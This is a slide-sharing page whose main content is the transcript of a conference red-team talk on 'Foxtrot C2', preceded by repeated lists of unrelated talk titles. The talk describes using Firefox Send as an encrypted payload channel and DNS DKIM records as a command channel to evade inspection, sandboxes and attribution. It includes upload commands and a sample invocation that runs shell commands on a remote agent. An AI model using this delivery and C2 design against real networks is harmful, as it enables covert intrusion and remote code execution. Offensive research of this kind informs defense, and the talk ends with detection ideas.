A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 

Dernier (20)

Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 

Foxtrot C2: A Journey of Payload Delivery

  • 1. Foxtrot C2. A Journey of Payload Delivery Safe(r) In-flight Payload Delivery Dimitry Snezhkov DerbyCon 8.0
  • 2. Officially: Sr. Managing Consultant, X-Force Red, IBM Corporation Boils down to work with: • Netz • Appz • Toolz • Codez • Humanz About
  • 3. Silence on the wire 30 minutes into sending a known good payload in a phish: Realization: Payload did not make it to the end user ... was it the link checker? ... was it the new / uncategorized domain access policy? ... was the payload package format caught by in-flight content inspection tools? ... did the user lack supported programs to deal with unwrapping the application payload? Note: The silence may be broken by a friendly sandbox visit under the name ”BOBS-PC”, joined by 12 more peers fetching and analyzing the payload over and over again. It’s a party, but not the one you want to be a part of! Now, can damage be contained/minimized? Can I avoid or delay attribution? Have You Ever …. ?
  • 4. • Reasonably acquiesced networks scream anomalies. • TLS Unwrap is a given • Behavioral patterns, load, type, frequency, etc. • If we allow defense to build a “story” of activities the vector is burned. Strike One: Traffic Correlation
  • 5. • Interception and immediate analysis of self contained payloads. Rinse and repeat • Correlation rules on payload spread across enterprise • Submission to cloud, analysis engines. No reuse. Strike Two: Payload Sampling
  • 6. • Link inspection • Domain ranking • Attribution and possibly defensive retaliation • Etc. etc. So…. Let’s minimize their effects, and avoid a few of them too. Strike Three: A La Carte Offensive Pain Menu
  • 7. • Properly configured layered in-flight defenses can be very effective for the Defense. • They can also be annoying to the Offense • may not be reliably replicated in test/lab or known • may lead to offensive teams giving up too early in the game. • (Not fighting OS defensive mechanisms here) Our Focus – In flight Defense
  • 8. An alternative offensive content delivery mechanism is needed. Primary goals: 1. Capability to deliver content across hostile traffic inspection mediums. E.g. TLS traffic inspection assumed. 2. Capability to reach externally hosted content from the inside in the face of a strict content proxy and a heavy domain ranking. 3. Capability to decrease repeatable sampling of externally hosted attacker content by defensive mechanisms by controlling content access parameters, including one-time links, storage expiration, access limits. 4. + Capability to minimize attribution at the initial visit/download/delivery stage. 5. + Capability to pass by link inspectors (e.g. UrlDefense) 6. + High degree of utilization needed. Secondary goals: Lao Tzu says: we shall discuss them later ;) Offensive Payload Delivery Mechanism Improvements
  • 9. Operation: Firefox Send Private, Encrypted File Sharing 1. Sender Uploads File 2. Firefox Stores Encrypted w/Shared Key Basic Access rules. 3. Recipient Downloads File
  • 10. Platform: Firefox Send Private, Encrypted File Sharing https://www.w3.org/TR/WebCryptoAPI WebCrypto API* with AES-GCM algorithm to encrypt and decrypt the file in the browser The file that's transferred to Mozilla's server is already encrypted and its contents can't be viewed by Mozilla • The link includes the encryption key • Anyone with the link to download and access the file. • 1 GB file size limit • 1-24 times download limit *Web crypto API
  • 11. • Send server can be deployed as a standalone server ( https://github.com/mozilla/send ) • Or hosted at https://send.firefox.com/ (our use case) Request (upload file and encrypt) POST /api/upload HTTP/1.1 Host: send.firefox.com X-File-Metadata: {"id":"55c97f947fc479547f16f125","filename":"monastery1.jpg"} Response: Additional Owner/ID Info: {"url":"https://send.firefox.com/download/3f9805bcd7/", "owner":"9dafe4c2d89b07101891","id":"3f9805bcd7"} Encrypted Link Format: https://send.firefox.com/download/3f9805bcd7/#M3DA7NgkqlswuM9GFT4BCA Platform: Firefox Send Private, Encrypted File Sharing
  • 12. Goal 1: Capability to deliver content across hostile traffic inspection (E.g. TLS traffic inspection) • Decryption of content in the browser by JS Encrypted last mile delivery https://send.firefox.com/download/baaf2ae527/#ez4iQudmTwsjSu41ZSYrOg • Proxy can inspect TLS, will see an encrypted blob. • Unless the mechanism is known will rarely attempt to automatically detect and unwrap application encryption. • One-time shared key between the browser of the uploader and the browser of file recipient. • We don’t have to generate, FF Send takes care of that. Solving key distribution Evaluating Firefox Send Private Sharing Against Our Goals
  • 13. Goal 2: Capability to reach hosted content in the face of a content proxy and heavy domain ranking https://send.firefox.com/ Mostly ranked high and “safe” Evaluating Firefox Send Private Sharing Against Our Goals
  • 14. Goal 3: Capability to decrease repeatable sampling of content by defense by controlling content access parameters, including expiration, access limits. Advantages: • Link download throttling: 1-20 times Sandbox gets nothing on the 2nd attempt • Generous size of files (up to 1 GB) • Link expiration by time (24 hours) • File forced/manual deletion. • Additional encryption passwords. Further logic can be built. We will see more when we discuss secondary goals. Evaluating Firefox Send Private Sharing Against Our Goals
  • 15. Goal 4: Capability to minimize attribution. • Storage OpSec: Ephemeral storage promise • No account to create. Owner is ephemeral File One: {"url":https://send.firefox.com/download/3f9805bcd7/ ,"owner":"9dafe4c2d89b07101891","id":"3f9805bcd7"} File Two: {"url":https://send.firefox.com/download/1839672b2a/ ,"owner":"77b8a3559416aa14d668","id":"1839672b2a "} Who is owner 77b8a3559416aa14d668 ?? (anonymous uploads.) Evaluating Firefox Send Private Sharing Against Our Goals
  • 16. Goal 5: Capability to minimize response from link inspectors https://send.firefox.com/download/1839672b2a/#os171fpGxYOLOykVYREN8w looks better than https://rogue.me/download/file Goal 6: Ability to progressively build delivery with off the shelf tools. Utilization / availability in all environments. The problem of shared keys fully custom application encryption: format support. Can you guarantee a client is able to unwrap? All you really need is a Firefox/Chrome/Safari browser with JS Crypto WebAPI. Edge (later/never?) Evaluating Firefox Send Private Sharing Against Our Goals
  • 17. Weaponizing A Happy File Sharing Service
  • 18. One time. Two times. Automate. 1. Building a delivery framework of agents based on the existing capabilities. 2. Solving task synchronization with split data and command channels. 3. Building command execution capability and hooks into the external C&C Secondary Goals: Automation
  • 19. Goal 1: Building delivery agents based on the existing capabilities. • FFSend is Browser to Browser, via WebAPI Crypto JS. Can we replicate / automate? curl 'https://send.firefox.com/api/upload’ -H 'Authorization: send-v1 4m6CIIsv28NhHzFwI4coO7NQ4ptuH2dkQ2m0Fmft2B0j1ZcE18aeUWfIa3iuVyTQURKHZ4OboKxZmcCJCFmKJQ’ -H 'Origin: https://send.firefox.com’ -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ6VYFlqCoVpBLf6Y’ -H 'X-File- Metadata: J8OulomBWho3RdLoeHBkOh23c5glLkfNLPHMZcV6Yctny1ydtkDsol1D_cJ8mQ-G2o_ c8wu6_avkca8o5-E4itPpOuzE2AD2hfGTA-TYjw’ --data-binary $'------ WebKitFormBoundaryQ6VYFlqCoVpBLf6YrnContent-Disposition: form-data; name="data"; filename="blob"rnContent-Type: application/octet-streamrnrnrn------ WebKitFormBoundaryQ6VYFlqCoVpBLf6Y--rn’ --compressed {"url":"https://send.firefox.com/download/58d18f7c65/","delete":"0120a59343513ec237a4","id":"58d18f7c65"} Secondary Goals: Automation
  • 20. Goal 1: Building delivery agents based on the existing capabilities (Cont.) JS Crypto WebAPI = Crypto Standards + HTTP libraries Py Crypto WebAPI = Crypto Standards + HTTP libraries Secondary Goals: Automation
  • 21. Agent Delivery Notification Problem: How do you make the other party know the shared key / URL? https://send.firefox.com/download/baaf2ae527/#ez4iQudmTwsjSu41ZSYrOg Notification side channels. The usual candidates HTTP, ICMP, DNS, etc. • HTTPS: Possible but: § Another highly ranked domain needed. Partially defeats the purpose. § Assume inspection of TLS, so another custom protocol to protect. • ICMP: Fairly limited structure- and capacity- wise, well inspected. • DNS: Inspected but we can probably blend in. Goal 1: Building delivery agents based on the existing capabilities (Cont.) Secondary Goals: Automation
  • 22. Goal 2: Solving synchronization with split data and command channels. DNS: • Data channel to FFSend. • Command channel to DNS. Wanted features: • Avoid detection with well behaved packets across reasonably infrequent traffic. No splitting of 1GB file and sending it across many DNS TXT records. • Dynamic DNS updates from the agents, access control with Transaction Signatures • Commands over well formed TXT DKIM records. • Additional record content encryption with FFSend shared key. Secondary Goals: Automation
  • 23. Communication Protocol Contract And how do we introduce communication directives? Develop and application protocol. DNS Record PAYLOAD { 't':'q’, 's':'J','c' :'o’, 'u': 'http://send.firefox.com/iuhui433/#903fkhf9884r3rhh3}
  • 24. Communication Protocol Contract Hhow do we introduce communication directives? Develop and application DSL protocol. 3. Decrypted DKIM Record Instruction (request metadata, location of payload) { 't':'q’, 's':'J','c' :'o’, 'u': 'http://send.firefox.com/iuhui433/#903fkhf9884r3rhh3’} 1. DNS TXT Record for an agent: 352d079ffdaddd23edd407ff32a66c48._domainkey.s3bucket.stream @138.68.224.147 2. DNS TXT Record Content (Encrypted with agent key): v=DKIM1; h=sha256; k=rsa; t=y; s=email; p=nCohnr6A1i0I7SOAMCs7tKfYxaTeWrT3aek
  • 26. • Might as well shuttle data AND commands. • Master/Slave concept by role • Peer-to-Peer concept by capability. • Store and poll model between the parties via FFSend service. Goal 3: Building command execution from the external C&C Secondary Goals: Automation
  • 27. Foxtrot C2 DATA channel: Firefox Send Service COMMAND channel: PowerDNS (choice) • Flexibility: Backend (SQL, Bind, Pipe, etc.) HTTP API possible (Future fallback, round robin) • Agents can change roles (Master/Slave) • Agents can communicate P2P (WIP) • Command line and TUI menu driven • Agents can be hosted on FF Send. • Jitter/Intervals to blend in traffic (WIP) • Internal agent commands (WIP) • Download or push files • Download or push instructions for OSexec() • Planned LTKM Python for now
  • 28. Foxtrot Operation ./foxtrot.py --agent agent_195694e2 --tsigname test2 --tsigrdata ./config/tsig-test2.dat --nserver 138.68.234.147 --domain s3bucket.stream --role master --verbose info send --operation ocmd --ocmd 'ps -ef | grep bash' Slave Master 1. Master (Post Job to Slave) 2. Slave (Receipt of Request): • Checks DNS record for its instructions • Fetches linked data file from FFSend • Processes (command or saves data) as instructed • Posts results back to FFSend • Updates DNS 3. Master (Get Response): • Checks DNS record for updates from Slave • Fetches linked data file from FFSend • Processes command output as instructed • Updates DNS record for Slave Agent
  • 29. Interactive Console. Master/Slave Batch. Send commands, data from command line Foxtrot C2: Modes of Operation
  • 30. Wire and Defense • Sample number of DNS TXT requests/responses, DKIM pointers • Vendors and Standalone implementations: • render CAPTCHAS for uploads • throttle number of uploads from the endpoint • Expect split protocol delivery across multiple channels
  • 31. • Payload Delivery itself is neither easy not hard, it’s a challenge with variables. • Despite popular belief great defensive setups exist that eat offense for lunch. • Know thyself. Challenge: Instrumented, understood business processes, acquiesced networks. Un-?Common State of Affairs Parting Thoughts
  • 32. Q&A Temporary location (will move, follow Twitter @Op_nomad): https://github.com/gh0std4ncer1/foxtrot Thanks!